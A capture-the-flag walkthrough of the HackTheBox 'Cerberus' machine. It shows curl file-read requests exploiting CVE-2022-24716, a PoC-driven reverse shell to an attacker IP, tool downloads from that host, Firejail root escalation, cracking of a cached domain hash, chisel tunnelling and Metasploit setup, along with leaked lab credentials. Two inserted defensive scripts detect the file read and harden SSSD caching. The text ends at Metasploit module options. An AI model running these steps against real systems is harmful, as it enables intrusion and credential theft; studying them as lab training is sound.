Initial nmap results show a single port open:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ nmap -sC -sV -p- --min-rate 1000 -oN nmap/cerberus -Pn $target_ip
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 07:09 EDT
Nmap scan report for cerberus.local ($target_ip)
Host is up (0.036s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Did not follow redirect to http://icinga.cerberus.local:8080/icingaweb2
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 143.23 seconds
This (thanks to the redirect notice) at least enumerated the domain (cerberus.local) and the running service, Icinga, on an eponymous subdomain, so I added the domain and subdomain to /etc/hosts:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ sudo vi /etc/hosts
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
# HTB
$target_ip cerberus.local icinga.cerberus.local
Browsing to http://icinga.cerberus.local:8080/icingaweb2 redirects to a login panel: http://icinga.cerberus.local:8080/icingaweb2/authentication/login
Tried default credentials of icingaadmin:icinga found with Google but no luck.
Tried catching the initial request in Burp to try to enumerate the version, as there was nothing obvious in the page source; searchsploit had nothing at all for Icinga either.
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ searchsploit icingaweb2
Exploits: No Results
Shellcodes: No Results
Threw gobuster at it while searching Google for CVEs, though nothing noteworthy came back (except perhaps that it kept failing to finish the wordlist at around 99% for some reason…)
This article from PortSwigger stood out so I had a peek: CVE-2022-24716 (Arbitrary File Read) could be patched in the running version but, as I didn't know what version that was yet, I looked for a proof of concept anyway.
Found this Python PoC script, but after reading through it I decided to just pull out the payload string and try it quickly with cURL for now:
<SNIP>
exploit_url=url+"/lib/icinga/icinga-php-thirdparty"+path
<SNIP>
First attempt was (confusingly) successful, as I tried /etc/passwd out of habit and this is supposed to be a Windows box… (WSL or a container?)
I'd completely blanked that it was picking the box up as Ubuntu when first going over the nmap scan… 🤦♂️
8080/tcp open http Apache httpd 2.4.52 ((Ubuntu))
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
matthew:x:1000:1000:matthew:/home/matthew:/bin/bash
ntp:x:108:113::/nonexistent:/usr/sbin/nologin
sssd:x:109:115:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
nagios:x:110:118::/var/lib/nagios:/usr/sbin/nologin
redis:x:111:119::/var/lib/redis:/usr/sbin/nologin
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
icingadb:x:999:999::/etc/icingadb:/sbin/nologin
Checked out the Icinga2 Documentation to see what useful files I might be able to grab with this vuln.
'config.ini' and 'resources.ini' certainly seem like they'd be worth a look:
config.ini: General configuration (global, logging, themes, etc.)
resources.ini: Global resources (Icinga Web 2 database for preferences and authentication, Icinga 2 IDO database)
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/config.ini
[global]
show_stacktraces = "1"
show_application_state_messages = "1"
config_backend = "db"
config_resource = "icingaweb2"
module_path = "/usr/share/icingaweb2/modules/"
[logging]
log = "syslog"
level = "ERROR"
application = "icingaweb2"
facility = "user"
[themes]
[authentication]
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/resources.ini
[icingaweb2]
type = "db"
db = "mysql"
host = "localhost"
dbname = "icingaweb2"
username = "matthew" <--- Nice
password = "IcingaWebPassword2023" <--- Nicer
use_ssl = "0"
echo 'matthew:IcingaWebPassword2023' >> loot/creds.txt
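A defender-side aside, added here and not part of the original writeup: the requests above leave a clear trace in the Apache access log, so this is a small Python detector that flags CVE-2022-24716-style reads through the icinga-php-thirdparty route, run over constructed sample log lines. The regexes, the SENSITIVE_PREFIXES list and the function names are my own assumptions, not anything from Icinga.

```python
import posixpath
import re
from urllib.parse import unquote

# Apache "combined" log line: enough fields to pull the client, request path and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
)

# The static-asset route used in the writeup. The vulnerable version appended whatever
# followed it to a filesystem path without sanitising it, so the suffix is what we inspect.
LIB_ROUTE_RE = re.compile(r'/lib/icinga/icinga-php-thirdparty(?P<suffix>/[^?]*)')

# Filesystem locations an asset request has no business resolving to (heuristic list).
SENSITIVE_PREFIXES = ('/etc/', '/proc/', '/root/', '/home/', '/var/', '/usr/share/icingaweb2/')

# Constructed sample log lines modelled on the requests made above; not from the real box.
SAMPLE_LOG = """\
10.10.14.76 - - [30/Apr/2023:07:20:01 -0400] "GET /icingaweb2/lib/icinga/icinga-php-thirdparty/etc/passwd HTTP/1.1" 200 2102 "-" "curl/7.88.1"
10.10.14.76 - - [30/Apr/2023:07:21:15 -0400] "GET /icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/resources.ini HTTP/1.1" 200 310 "-" "curl/7.88.1"
10.10.14.76 - - [30/Apr/2023:07:22:40 -0400] "GET /icingaweb2/lib/icinga/icinga-php-thirdparty/%2e%2e/%2e%2e/etc/hostname HTTP/1.1" 200 7 "-" "python-requests/2.28.0"
192.168.1.20 - - [30/Apr/2023:07:23:02 -0400] "GET /icingaweb2/lib/icinga/icinga-php-thirdparty/vendor/some-library/style.css HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
192.168.1.20 - - [30/Apr/2023:07:23:05 -0400] "GET /icingaweb2/authentication/login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""


def fully_decode(path: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded traversal (%252e%252e) is still caught."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify(path: str):
    """Return a reason if the request path looks like a CVE-2022-24716 file read, else None."""
    m = LIB_ROUTE_RE.search(path)
    if not m:
        return None
    suffix = fully_decode(m.group('suffix'))
    # Check for '..' before normalising, because normpath() would collapse it away.
    if any(seg == '..' for seg in suffix.split('/')):
        return 'traversal sequence in asset suffix'
    resolved = posixpath.normpath(suffix)
    for prefix in SENSITIVE_PREFIXES:
        if resolved.startswith(prefix):
            return f'asset suffix resolves to {resolved}'
    return None


def scan_access_log(text: str):
    """Run classify() over every parseable line and return the suspicious ones."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = classify(m.group('path'))
        if reason:
            hits.append({'ip': m.group('ip'), 'status': int(m.group('status')),
                         'path': m.group('path'), 'reason': reason})
    return hits


if __name__ == '__main__':
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['status']} {hit['path']} -> {hit['reason']}")
```

A 200 on any flagged line is the signal that the read actually succeeded; a patched instance should answer such requests with an error.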
Going back to the browser I can login to the admin panel:
I also now know the exact service version:
Next up, it's vulnerable to CVE-2022-24715 (Authenticated Remote Code Execution), with another proof of concept script here.
Tried messing around with it manually via Burp and the web app for a while by adding a user and an SSH key according to this…
…but it was giving me too much lip: first there were issues with the key format (not using a passphrase when generating it seemed to be the resolution here, but NFI why; an encoding issue, I think).
After getting over that hurdle I just couldn't seem to execute any PHP code with it; again, I'd assume an encoding issue.
Knowing there was likely a much easier route, I went for the above PoC script… I don't really understand why this was any better than the manual method, because it seemed to be doing the exact same thing.
Needed an SSH key in PEM format either way, so:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools]
└─$ ssh-keygen -t rsa -m PEM -f key
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in key
Your public key has been saved in key.pub
The key fingerprint is:
SHA256:oSBt+tCEuHfEfDQ/+t/v7k0PIa886eoIgZ3IEWKMw+I kali@kali
Fired up netcat on 9001 to catch my shell…
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
…and executed the CVE-2022-24715 PoC script in another terminal:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools]
└─$ python3 exploit.py -t http://icinga.cerberus.local:8080/icingaweb2/ -I 10.10.14.76 -P 9001 -u matthew -p IcingaWebPassword2023 -e key
[INFO] Attempting to login to the Icinga Web 2 instance...
[INFO] Attempting to upload our malicious module...
[SUCCESS] The payload appears to be uploaded successfully!
[INFO] Modifying configurations...
[INFO] Attempting to enable the malicious module...
[INFO] Trying to trigger payload! Have a listener ready!
[SUCCESS] It appears that a reverse shell was started!
[INFO] Removing malicious module file...
[INFO] Disabling malicious module...
[INFO] Resetting website configuration...
[SUCCESS] Cleanup successful! Shutting down...
[ALERT] In the process of exploitation, the application logging has been turned off. Log in manually to reset these settings!
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools]
└─$
Had Python3 available on the box, so did the usual trick to get a fully interactive TTY:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.76] from (UNKNOWN) [$target_ip] 49874
bash: cannot set terminal process group (630): Inappropriate ioctl for device
bash: no job control in this shell
www-data@icinga:/usr/share/icingaweb2/public$ which python
which python
www-data@icinga:/usr/share/icingaweb2/public$ which python3
which python3
/usr/bin/python3
www-data@icinga:/usr/share/icingaweb2/public$ python3 -c "import pty;pty.spawn('/bin/bash')"
<lic$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@icinga:/usr/share/icingaweb2/public$ ^Z
zsh: suspended nc -lvnp 9001
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ stty raw -echo && fg
[1] + continued nc -lvnp 9001
www-data@icinga:/usr/share/icingaweb2/public$ export TERM=tmux-256color
Stood up a local web server to get LinPEAS onto the machine to look for PrivEsc vectors:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools]
└─$ sudo python3 -m http.server 80
[sudo] password for kali:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
$target_ip - - [30/Apr/2023 15:09:21] "GET /linpeas.sh HTTP/1.1" 200 -
LinPeas doesn't think we're in a container…interesting.
-rwsr-xr-x 1 root root 464K Jan 19 2022 /usr/bin/firejail (Unknown SUID binary!) <---- This is worth a look though...
Googled for 'firejail' and there's yet another CVE with a PoC script that can be leveraged to get root on the Linux container (which I assume is just this Firejail sandbox now).
Read through the explanation of CVE-2022-31214 'FireJoin' here and made use of the proof of concept script linked at the end of the article (needed to change the extension to .py).
www-data@icinga:/dev/shm$ curl http://10.10.14.76/firejoin.py -o firejoin.py
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 8651 100 8651 0 0 138k 0 --:--:-- --:--:-- --:--:-- 140k
www-data@icinga:/dev/shm$ ls
firejoin.py linpeas.sh
www-data@icinga:/dev/shm$ file firejoin.py
firejoin.py: Python script, ASCII text executable
www-data@icinga:/dev/shm$ python3 firejoin.py
/dev/shm/firejoin.py needs to have the execute bit set for the exploit to work. Run `chmod +x /dev/shm/firejoin.py` and try again.
www-data@icinga:/dev/shm$ chmod +x firejoin.py && python3 firejoin.py
You can now run 'firejail --join=19941' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.
Fired up another reverse shell with the same method as before on another port:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ nc -lvnp 9002
listening on [any] 9002 ...
connect to [10.10.14.76] from (UNKNOWN) [10.129.194.21] 49870
bash: cannot set terminal process group (622): Inappropriate ioctl for device
bash: no job control in this shell
www-data@icinga:/usr/share/icingaweb2/public$ python3 -c "import pty;pty.spawn('/bin/bash')"
<lic$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@icinga:/usr/share/icingaweb2/public$ ^Z
zsh: suspended nc -lvnp 9002
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ stty raw -echo && fg
[1] + continued nc -lvnp 9002
www-data@icinga:/usr/share/icingaweb2/public$ export TERM=tmux-256color
www-data@icinga:/usr/share/icingaweb2/public$ firejail --join=19941
changing root to /proc/19941/root
Warning: cleaning all supplementary groups
Child process initialized in 13.65 ms
www-data@icinga:/usr/share/icingaweb2/public$ su -
root@icinga:~#
Got root - still no flags though, so nowhere near done…after some flapping about in the wind, checked out /etc/hosts…
root@icinga:~# cat /etc/hosts
127.0.0.1 iceinga.cerberus.local iceinga
127.0.1.1 localhost
172.16.22.1 DC.cerberus.local DC cerberus.local ...revealing this.
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
root@icinga:~#
Looking through LinPEAS output again… I'd re-run it as root just in case, not sure if it made a difference, or if I'd just not picked up on it the first time (note to self: learn to save output), but this eventually stood out, being domain related n'all…
[sssd]
domains = cerberus.local
config_file_version = 2
services = nss, pam
[domain/cerberus.local]
default_shell = /bin/bash
ad_server = cerberus.local
krb5_store_password_if_offline = True
cache_credentials = True
krb5_realm = CERBERUS.LOCAL
realmd_tags = manages-system joined-with-adcli
id_provider = ad
fallback_homedir = /home/%u@%d
ad_domain = cerberus.local
use_fully_qualified_names = True
ldap_id_mapping = True
access_provider = ad
-rw-r--r-- 1 root root 169 Oct 4 2022 /usr/lib/x86_64-linux-gnu/sssd/conf/sssd.conf
[sssd]
domains = shadowutils
Almost certainly what we want to target to get onto the Windows machine (172.16.22.1), and a bit of Googling only added confirmation: SSSD Documentation
cache_credentials = True <--- Sounds particularly juicy...wonder where the cache is...
Eventually found it with some
find / | grep -i sss
root@icinga:/var/lib/sss/db# ls
cache_cerberus.local.ldb config.ldb timestamps_cerberus.local.ldb
ccache_CERBERUS.LOCAL sssd.ldb
root@icinga:/var/lib/sss/db#
Binary format, but 'strings' handles it well enough:
root@icinga:/var/lib/sss/db# file cache_cerberus.local.ldb
cache_cerberus.local.ldb: TDB database version 6, little-endian hash size 10000 bytes
root@icinga:/var/lib/sss/db# strings cache_cerberus.local.ldb
<SNIP>
cachedPassword
$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0
cachedPasswordType
<SNIP>
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ echo '$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0' >> hash
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
147258369 (?)
1g 0:00:00:00 DONE (2023-04-30 13:06) 2.500g/s 1280p/s 1280c/s 1280C/s jeffrey..letmein
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$
Nice..
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ echo "matthew:147258369" >> loot/creds.txt
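As an added defender-side example (not part of the original writeup), a small audit of the sssd.conf recovered above: it flags the two offline-caching settings that left a crackable domain hash on disk and emits a hardened copy. The input is the page's own config reproduced as a constructed string; the RISKY_SETTINGS table and the function names are my own assumptions.

```python
import configparser
import io

# The sssd.conf recovered above, reproduced here as the constructed input for the audit.
FOUND_CONF = """\
[sssd]
domains = cerberus.local
config_file_version = 2
services = nss, pam

[domain/cerberus.local]
default_shell = /bin/bash
ad_server = cerberus.local
krb5_store_password_if_offline = True
cache_credentials = True
krb5_realm = CERBERUS.LOCAL
realmd_tags = manages-system joined-with-adcli
id_provider = ad
fallback_homedir = /home/%u@%d
ad_domain = cerberus.local
use_fully_qualified_names = True
ldap_id_mapping = True
access_provider = ad
"""

# Settings worth flagging on a host that has no real need for offline logins, and why.
RISKY_SETTINGS = {
    'cache_credentials': (
        'domain password hashes (sha512crypt, $6$...) are persisted under '
        '/var/lib/sss/db and can be cracked offline by anyone who obtains root'),
    'krb5_store_password_if_offline': (
        "sssd keeps the user's password in memory while the DC is unreachable so it "
        'can request a TGT later; another secret for a root-level attacker to harvest'),
}


def load(conf_text: str) -> configparser.ConfigParser:
    # interpolation=None: sssd values such as /home/%u@%d are not configparser templates.
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(conf_text)
    return cp


def audit_sssd(conf_text: str):
    """Return (section, key, why) for every domain section that enables a risky setting."""
    cp = load(conf_text)
    findings = []
    for section in cp.sections():
        if not section.startswith('domain/'):
            continue
        for key, why in RISKY_SETTINGS.items():
            if cp.getboolean(section, key, fallback=False):
                findings.append((section, key, why))
    return findings


def harden(conf_text: str) -> str:
    """Return the config with offline caching disabled for every domain.

    Trade-off: users can no longer log in while the DC is unreachable, which is
    usually acceptable for an always-connected server like this monitoring host.
    """
    cp = load(conf_text)
    for section in cp.sections():
        if section.startswith('domain/'):
            for key in RISKY_SETTINGS:
                cp[section][key] = 'False'
    out = io.StringIO()
    cp.write(out)
    return out.getvalue()


if __name__ == '__main__':
    for section, key, why in audit_sssd(FOUND_CONF):
        print(f'[{section}] {key} = True: {why}')
    print(harden(FOUND_CONF))
```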
Need to look for something running on the DC that we can pivot to…try dropping a compiled nmap for win32 to the box:
root@icinga:/dev/shm# wget http://10.10.14.76/nmap-x64.tar.gz
--2023-04-30 21:30:13-- http://10.10.14.76/nmap-x64.tar.gz
Connecting to 10.10.14.76:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10686789 (10M) [application/gzip]
Saving to: 'nmap-x64.tar.gz'
nmap-x64.tar.gz 100%[===================>] 10.19M 463KB/s in 30s
2023-04-30 21:30:43 (350 KB/s) - 'nmap-x64.tar.gz' saved [10686789/10686789]
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
MAC Address: 00:15:5D:5F:E8:00 (Microsoft)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
WinRM… but first we'll need to tunnel with chisel.
The attacking machine is the server, in reverse mode:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools]
└─$ chisel server -p 8888 --reverse
And on the Linux box:
./chisel client --max-retry-count=1 10.10.14.76:8888 R:5985:172.16.22.1:5985
You can search for 'chisel' on ippsec.rocks for good explanations of all this tunnelling business (awesome resource in general anytime you're stuck but have some keywords you can throw at it).
2023/04/30 17:57:32 server: Reverse tunnelling enabled
2023/04/30 17:57:32 server: Fingerprint 7oPtF2heLbHEu0624ToKDh1dQ/bUjiTB03h+EDZHmds=
2023/04/30 17:57:32 server: Listening on http://0.0.0.0:8888
2023/04/30 17:57:36 server: session#1: tun: proxy#R:5985=>172.16.22.1:5985: Listening
Then in another terminal on the attacking box:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ evil-winrm -i 127.0.0.1 -u matthew -p 147258369
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\matthew\Documents> whoami
cerberus\matthew
*Evil-WinRM* PS C:\Users\matthew\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\matthew\Desktop> ls
Directory: C:\Users\matthew\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/30/2023 12:29 PM 34 user.txt
*Evil-WinRM* PS C:\Users\matthew\Desktop> type user.txt
f2f8d9bec0fd854c4fee75e0a37594df
*Evil-WinRM* PS C:\Users\matthew\Desktop>
Finally have User… 😌
Grabbed WinPEAS from here to look for a PrivEsc vector and uploaded it to the box through Evil-WinRM:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools]
└─$ evil-winrm -i 127.0.0.1 -u matthew -p 147258369
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\matthew\Documents> upload winPEASany.exe
Info: Uploading /home/kali/HackTheBox/Machines/Cerberus/tools/winPEASany.exe to C:\Users\matthew\Documents\winPEASany.exe
Data: 2703360 bytes of 2703360 bytes copied
Info: Upload successful!
Spent a while gawping at WinPEAS output, with nothing really jumping out at me initially, but there is "ManageEngine", which is non-standard and on inspection seemed AD related, so I Googled it and found that there's yet another public vulnerability: CVE-2022-47966
*Evil-WinRM* PS C:\Users\matthew\Documents> cd "C:/Program Files (x86)"
*Evil-WinRM* PS C:\Program Files (x86)> ls
Directory: C:\Program Files (x86)
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/15/2018 12:28 AM Common Files
d----- 5/1/2023 4:08 AM Google
d----- 9/7/2022 4:34 AM Internet Explorer
d----- 1/29/2023 11:12 AM ManageEngine <---
d----- 9/15/2018 12:19 AM Microsoft.NET
d----- 8/24/2021 7:47 AM Windows Defender
d----- 8/24/2021 7:47 AM Windows Mail
d----- 9/7/2022 4:34 AM Windows Media Player
d----- 9/15/2018 12:19 AM Windows Multimedia Platform
d----- 9/15/2018 12:28 AM windows nt
d----- 8/24/2021 7:47 AM Windows Photo Viewer
d----- 9/15/2018 12:19 AM Windows Portable Devices
d----- 9/15/2018 12:19 AM WindowsPowerShell
It's only listening locally on the Windows box though…which means another pivot 😱
*Evil-WinRM* PS C:\Users\matthew\Documents> netstat -anop TCP
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING 700
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 952
TCP 0.0.0.0:389 0.0.0.0:0 LISTENING 700
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:464 0.0.0.0:0 LISTENING 700
TCP 0.0.0.0:593 0.0.0.0:0 LISTENING 952
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING 700
TCP 0.0.0.0:808 0.0.0.0:0 LISTENING 5552
TCP 0.0.0.0:1500 0.0.0.0:0 LISTENING 5552
TCP 0.0.0.0:1501 0.0.0.0:0 LISTENING 5552
TCP 0.0.0.0:2179 0.0.0.0:0 LISTENING 3424
TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING 700
TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING 700
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8888 0.0.0.0:0 LISTENING 5756
TCP 0.0.0.0:9251 0.0.0.0:0 LISTENING 5756 <--- ManageEngine listening locally on 9251
TCP 0.0.0.0:9389 0.0.0.0:0 LISTENING 2016
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49459 0.0.0.0:0 LISTENING 3136
The listening port was found here after some searching.
Get another chisel server going on the attack box:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools]
└─$ chisel server -p 9999 --reverse
2023/05/01 08:45:17 server: Reverse tunnelling enabled
2023/05/01 08:45:17 server: Fingerprint /ouUxxvtKDEl+5tBsDCw23XZj9LHxliOGD6mTJsFzuQ=
2023/05/01 08:45:17 server: Listening on http://0.0.0.0:9999
2023/05/01 08:50:25 server: session#1: tun: proxy#R:9251=>172.16.22.1:9251: Listening
Get the .exe version of chisel and upload it to the Windows box. I could just have used Evil-WinRM's built-in 'upload' here, but I forgot it was a thing and went with curl:
*Evil-WinRM* PS C:\Users\matthew\Documents> curl 10.10.14.76/chisel.exe -o chisel.exe
*Evil-WinRM* PS C:\Users\matthew\Documents> ./chisel.exe client --max-retry-count=1 10.10.14.76:9999 R:9251:172.16.22.1:9251
This did…something, as I could hit the page in Firefox now…
…but after a bit of loading resources it tries to redirect to dc.cerberus.local (taking its time about it) with some params that made me think it had worked at first, but then it failed to display the page:
Or maybe it should be:
./chisel.exe client --max-retry-count=1 10.10.14.76:9999 R:1080:socks
Still couldn't hit it…edited /etc/hosts to point everything at localhost:
#10.129.229.4 cerberus.local incinga.cerberus.local
127.0.0.1 cerberus.local icinga.cerberus.local dc.cerberus.local
Still couldn't hit it, but then it occurred to me to add the SOCKS proxy in Firefox 🤦♂️
Then navigating to https://dc.cerberus.local:9251 and I'm finally in…
Logged in with matthew@cerberus.local:147258369:
Not much to see on the page, but there is a GUID in the URL that became important for the next exploit:
67a8d101690402dc6a6744b8fc8a7ca1acf88b2f
Fired up MetaSploit for this last step:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ msfconsole
=[ metasploit v6.3.13-dev ]
+ -- --=[ 2311 exploits - 1205 auxiliary - 412 post ]
+ -- --=[ 975 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: View advanced module options with
advanced
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search manageengine
Realised at this point (read: after a lot more failing) that I had to set the SOCKS proxy for MSF to see the service, so backed out and edited proxychains4.conf:
```ini
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
socks5 127.0.0.1 1080
```
Then:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ sudo proxychains4 -q bash
[sudo] password for kali:
┌──(root㉿kali)-[/home/kali/HackTheBox/Machines/Cerberus]
└─# msfconsole
=[ metasploit v6.3.13-dev ]
+ -- --=[ 2311 exploits - 1205 auxiliary - 412 post ]
+ -- --=[ 975 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Metasploit can be configured at startup, see
msfconsole --help to learn more
Metasploit Documentation: https://docs.metasploit.com/
msf6 >
msf6 > use exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966
[*] Using configured payload cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > options
<SNIP>
Module options (exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966):
---- --------------- -------- -----------
GUID 67a8d101690402dc6a6744b8fc8a7ca1acf88b2f yes The SAML endpoint GUID
ISSUER_URL http://dc.cerberus.local/adfs/services/trust yes The Issuer URL used by the Identity Provider which has been configured as the SAML authentication provider for the target server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RELAY_STATE no The Relay State. Default is "http(s)://<rhost>:<rport>/samlLogin/LoginAuth"
RHOSTS 172.16.22.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 9251 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /samlLogin yes The SAML endpoint URL
URIPATH no The URI to use for this exploit (default is random)
